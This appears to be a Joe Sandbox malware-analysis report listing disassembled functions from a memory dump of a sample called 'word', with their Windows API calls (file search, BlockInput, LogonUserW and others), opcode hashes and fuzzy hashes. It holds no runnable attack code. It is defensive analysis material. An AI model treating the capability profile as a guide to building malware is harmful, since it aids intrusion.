                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 436276e02b07ab2fc2fbb9ef65feb62f59ffdb7e44ebd27f42a301b2cca85d53
                                                                            • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                            • Opcode Fuzzy Hash: 436276e02b07ab2fc2fbb9ef65feb62f59ffdb7e44ebd27f42a301b2cca85d53
                                                                            • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                            Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                            • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                            • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                            • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                            • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                            • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                            Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __time64.LIBCMT ref: 004433A2
                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                            • String ID: rJ
                                                                            • API String ID: 2893107130-1865492326
                                                                            • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                            • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                            • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                            • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                            Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __time64.LIBCMT ref: 004433A2
                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                            • String ID: rJ
                                                                            • API String ID: 2893107130-1865492326
                                                                            • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                            • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                            • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                            • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                            Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                            • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                            • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                            • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                            • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                            Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0vH$HH
                                                                            • API String ID: 0-728391547
                                                                            • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                            • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                            • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                            • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                            Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _memset
                                                                            • String ID:
                                                                            • API String ID: 2102423945-0
                                                                            • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                            • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                            • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                            • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                            Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Proc
                                                                            • String ID:
                                                                            • API String ID: 2346855178-0
                                                                            • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                            • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                            • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                            • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                            Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                            • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                            • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                            • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                            Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                            • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                            • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                            • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                            Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                            • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                            • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                            • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                            Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00422033
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                            • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                            • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                            • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                            Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                            • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                            • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                            Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                            • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                            • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                            Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                            • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                            • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                            Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                            • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                            • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                            Function 00490D70 Relevance: .1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dc161bfdc883d32f341db1e4eb054b8efbcdca7b353545205808113d9fe9948c
                                                                            • Instruction ID: ec7c59e3bdc82c80c290d746f05686fd589804af8b2464336537e2c1352b8ccd
                                                                            • Opcode Fuzzy Hash: dc161bfdc883d32f341db1e4eb054b8efbcdca7b353545205808113d9fe9948c
                                                                            • Instruction Fuzzy Hash: F741456544E7D04FCB138BB888B9AA27FB0AE07214B5F44DBC5C5CF4B3D658994AC722
                                                                            Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                            • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                            • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                            • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                            Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 004593D7
                                                                            • DeleteObject.GDI32(?), ref: 004593F1
                                                                            • DestroyWindow.USER32 ref: 00459407
                                                                            • GetDesktopWindow.USER32 ref: 0045942A
                                                                            • GetWindowRect.USER32(00000000), ref: 00459431
                                                                            • SetRect.USER32 ref: 00459568
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                            • CreateWindowExW.USER32 ref: 004595BB
                                                                            • GetClientRect.USER32(00000000,?,?,50000001,?,?,00000000,00000000,00000000), ref: 004595C8
                                                                            • CreateWindowExW.USER32 ref: 00459615
                                                                            • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000), ref: 00459635
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00459668
